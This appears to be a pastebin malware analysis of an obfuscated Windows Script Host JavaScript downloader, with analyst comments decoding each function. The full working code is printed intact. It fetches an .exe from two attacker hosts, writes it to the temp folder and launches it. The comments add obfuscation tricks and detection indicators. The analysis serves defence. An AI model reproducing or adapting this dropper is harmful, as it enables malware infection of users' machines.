dynamoo

Malicious Javascript

Feb 29th, 2016
  1.  
  2.  
  // Analyst note: process-launch helper.
  // Creates a WScript.Shell COM object and calls Run() on the command string
  // it receives. In WshShell.Run the second argument (0x1) is the window style
  // and the third (0x0) means the script does not wait for the process to exit.
  // The only caller in this listing passes the path of the file the script has
  // just written to disk.
  3. function PnENwlyvJ(vHjcaOQlznv) {
  4. var NphasvLL = WScript.CreateObject("Wscript.Shell");
  5. NphasvLL.Run(vHjcaOQlznv, 0x1, 0x0);
  6. }
  // Analyst note: returns the current user's temp directory with a trailing
  // backslash.
  // The three parameters are never read; the caller passes junk strings.
  // The ProgID is assembled from a space-separated decoy string: the split
  // gives ["jZQvsR","MHu","pt.Shell","nutmHCF","Scri"], and
  // "W" + [4] + [2] evaluates to "WScript.Shell". The (1)? ternary is always
  // true. Presumably this keeps the ProgID from appearing as one literal.
  7. function HOpGucZue(WeMHq,Bvmzy,woTkH) {
  8. var kqMgQ = "jZQvsR MHu pt.Shell nutmHCF Scri".split(" ");
  9. var kYZ=((1)?"W" + kqMgQ[4]:"")+kqMgQ[2];
  10. var oI = WScript.CreateObject(kYZ);
  11. var zK = "%TEMP%\\";
  12. return oI.ExpandEnvironmentStrings(zK); // expands %TEMP% for the running user
  13. }
  // Analyst note: string builder with no inputs and no side effects.
  // The concatenation evaluates to "Scripting.FileSystemObject"; the top-level
  // code passes the result to new ActiveXObject().
  14. function mfPDpXYb() {
  15. var PiRQwTc = "ipting";
  16. var EPfJUumpGx = "ile";
  17. var sUKZH = "System";
  18. return "Sc" + "r" + PiRQwTc + ".F" + EPfJUumpGx + sUKZH + "Obj" + "ect";
  19. }
  // Analyst note: one-line wrapper that instantiates the COM object named by
  // the ProgID string it is given and returns it. The top-level code uses it
  // for the HTTP request object and the stream object.
  20. function MMOt(EXjbN) {
  21. return WScript.CreateObject(EXjbN);
  22. }
  // Analyst note: wrapper for <object>.write(<data>). The single call site
  // passes the stream object and the HTTP response body, so this is where the
  // downloaded bytes enter the stream.
  23. function NIwF(BsRNx,OGReG) {
  24. BsRNx.write(OGReG);
  25. }
  // Analyst note: wrapper for <object>.open() with no arguments. The single
  // call site passes the stream object.
  26. function AJsz(gaXUm) {
  27. gaXUm.open();
  28. }
  // Analyst note: wrapper for <object>.saveToFile(<path>, 2); 542-540
  // evaluates to 2. The call site passes the stream object; for an
  // ADODB.Stream, option 2 means create the file or overwrite an existing one.
  // This is the step that writes the downloaded content to disk.
  29. function AYMy(nklNg,sCjDD) {
  30. nklNg.saveToFile(sCjDD,542-540);
  31. }
  // Analyst note: wrapper for <request>.open(method, url, false).
  // The argument order is (request, url, method). The hard-coded third
  // argument to open() is false, which on an XMLHTTP object makes the request
  // synchronous.
  32. function vOjl(FPpRI,UoIZQ,MXtkg) {
  33. FPpRI.open(MXtkg,UoIZQ,false);
  34. }
  // Analyst note: returns true when the argument loosely equals 200
  // (864-664), otherwise false. The call site feeds it the HTTP status, so it
  // is an "HTTP 200 OK" check with the constant hidden behind arithmetic.
  35. function CgWa(JfBRD) {
  36. if (JfBRD == 864-664){return true;} else {return false;}
  37. }
  // Analyst note: returns true when the argument is greater than 176277
  // (176425-148), otherwise false. The call site feeds it the stream size, so
  // a response of 176277 bytes or fewer is not saved or run. Presumably this
  // filters out error pages and placeholder responses; the listing does not
  // state the reason.
  38. function HlTW(EoAPD) {
  39. if (EoAPD > 176425-148){return true;} else {return false;}
  40. }
  // Analyst note: string decoder. Returns the characters found at odd indexes
  // (1, 3, 5, ...) of the input; the even-index characters are padding.
  // The arithmetic reduces to: start at 0, test x % 2 != 0, take substr(x, 1).
  // The loop counter x is assigned without var, so it becomes an implicit
  // global.
  41. function NMLT(UHZEQ) {
  42. var TKMXZ="";
  43. for(x=(153-153); x < UHZEQ.length; x++)
  44. if (x % (849-847) != (256-256)) {
  45. TKMXZ += UHZEQ.substr(x, 241-240);
  46. }
  47. return TKMXZ;
  48. }
  // Analyst note: wrapper for <request>.send() with no body. The call site
  // passes the HTTP request object right after it has been opened, so this is
  // the point where the network request is actually made.
  49. function oVGt(bXoBQ) {
  50. bXoBQ.send();
  51. }
  // Analyst note: returns the .status property of the object it is given. The
  // call site passes the HTTP request object, so this reads the HTTP response
  // status code.
  52. function lQWj(BoMrR) {
  53. return BoMrR.status;
  54. }
  // Analyst note: main routine of a Windows Script Host download-and-run
  // script. Summary of what the statements below do, for triage and detection:
  //   * decodes a list of download locations from the padded string Yo
  //   * creates the folder %TEMP%\elbCzuv\
  //   * requests each location over HTTP and keeps the first response that has
  //     status 200 and a body larger than 176277 bytes
  //   * writes that body to %TEMP%\elbCzuv\912892.exe and launches it
  // Host-side indicators visible here: the folder and file names above, and a
  // script host process that creates MSXML2.XMLHTTP and ADODB.Stream objects
  // and then starts an .exe from the temp directory.
  //
  // Yo holds the location list with a padding character before every real
  // character. Taking the odd-index characters and splitting on spaces gives
  // five entries (defanged): "helloyungmenqq[.]com/69.exe?",
  // "ohiyoungbuyff[.]com/69.exe?", "?", "?", "?".
  55. var Yo="yhGeelDlQoDyXu9nGgWm1eLnTqRqm.ecFoems/D6l98.7esxAe9?F Lo1hNihyVobudnQgYbcuNyhfGfZ.LcGo8mH/T6i9o.teVxceS?u Y?A J?U v?";
  56. var c = NMLT(Yo).split(" ");
  // The three string arguments are ignored by HOpGucZue; LrW is the expanded
  // %TEMP%\ path.
  57. var LrW = HOpGucZue("hqwL","dwqHr","hgrELU");
  // mfPDpXYb() evaluates to "Scripting.FileSystemObject".
  58. var auz = new ActiveXObject(mfPDpXYb());
  59. var boAJ = LrW+"elbCzuv\\";
  // Folder creation errors (for example, the folder already exists) are
  // silently ignored.
  60. try{
  61. auz.CreateFolder(boAJ);
  62. }catch(QaqnaZ){
  63. };
  // rKV is a decoy-padded fragment table. After the split: [0]="2.XMLHTTP",
  // [3]="XML", [4]="ream", [5]="St", [7]="AD", [9]="OD"; the other entries are
  // filler.
  64. var yng = "2.XMLH";
  65. var rKV = (yng + "TTP" + " KopxpjI YNeoY XML ream St sPdOQrOb AD rzIcuTc OD").split(" ");
  // sp is never read. RZce evaluates to "ADOD".
  66. var sp = true  , RZce = rKV[7] + "" + rKV[9];
  // (306427, rKV[0]) is a comma expression: the number is discarded and the
  // value is rKV[0]. The ProgID evaluates to "MSXML2.XMLHTTP".
  67. var mL = MMOt("MS"+rKV[3]+(306427, rKV[0]));
  // Same comma-expression trick; the ProgID evaluates to "ADODB.Stream".
  68. var Wub = MMOt(RZce + "B." + rKV[5]+(825927, rKV[4]));
  69. var KbI = 0;
  // i is appended to every URL and is never changed in this listing.
  70. var i = 1;
  // dTtgsXS is used as the base name of the file written to disk.
  71. var dTtgsXS = 912892;
  72. var h=KbI;
  // Loop over the decoded location list; h is the index. The loop ends when
  // the list is exhausted or after the first download that passes the checks.
  73. while (true)  {
  74. if(h>=c.length) {break;}
  // Wt flags that a payload was saved during this iteration.
  75. var Wt = 0;
  // MQv is another decoy-padded table: [0]="ht", [2]="tp", [5]="://",
  // [7]=".exe". [0]+[2]+[5] evaluates to "http://". The "GET" entry in the
  // table is unused; the method is passed as a literal on line 78.
  76. var MQv = ("ht" + " DOFHPHM tp whdfV gambqeDe :// bXPmNZP .exe  GET").split(" ");
  77. try  {
  // Synchronous GET to "http://" + c[h] + i, e.g. a URL ending in
  // "/69.exe?1"; processing continues only when the status is 200.
  78. vOjl(mL,MQv[0]+MQv[2]+MQv[5]+c[h]+i, "GET"); oVGt(mL); if (CgWa(lQWj(mL)))  {      
  // Open the stream, set type 1 (binary for ADODB.Stream), copy the response
  // body in, then apply the minimum-size check.
  79. AJsz(Wub); Wub.type = 1; NIwF(Wub,mL.responseBody); if (HlTW(Wub.size))  {
  // Rewind the stream and save it as boAJ + "912892" + ".exe". The
  // /*...*/ fragments are inert comments inserted as noise.
  80. Wt = 1; Wub.position = 0; AYMy(Wub,/*qWMW72LFKl*/boAJ/*gr7c91tcbM*/+dTtgsXS+MQv[7]); try  {
  // Comma expression again: the date comparison is discarded and the constant
  // 7448464888 is the condition, so this branch is always taken.
  81. if (((new Date())>0,7448464888)) {
  // Launch the saved file. The break below leaves the while loop without
  // reaching Wub.close().
  82. PnENwlyvJ(boAJ+dTtgsXS+/*C8KP47dYcj*/MQv[7]/*kGIG32ZLIA*/);
  83. break;
  84. }
  85. }
  // Errors from the launch attempt are swallowed.
  86. catch (ra)  {
  87. };
  88. }; Wub.close();
  89. };
  // Reached only when a payload was saved but the launch path did not break
  // out (for example, the launch threw): stop trying further locations.
  90. if (Wt == 1)  {
  91. KbI = h; break;
  92. };
  93. }
  // Any network or stream error is swallowed, so a failed location simply
  // falls through to the next one.
  94. catch (ra)  {
  95. };
  96. h++;
  97. };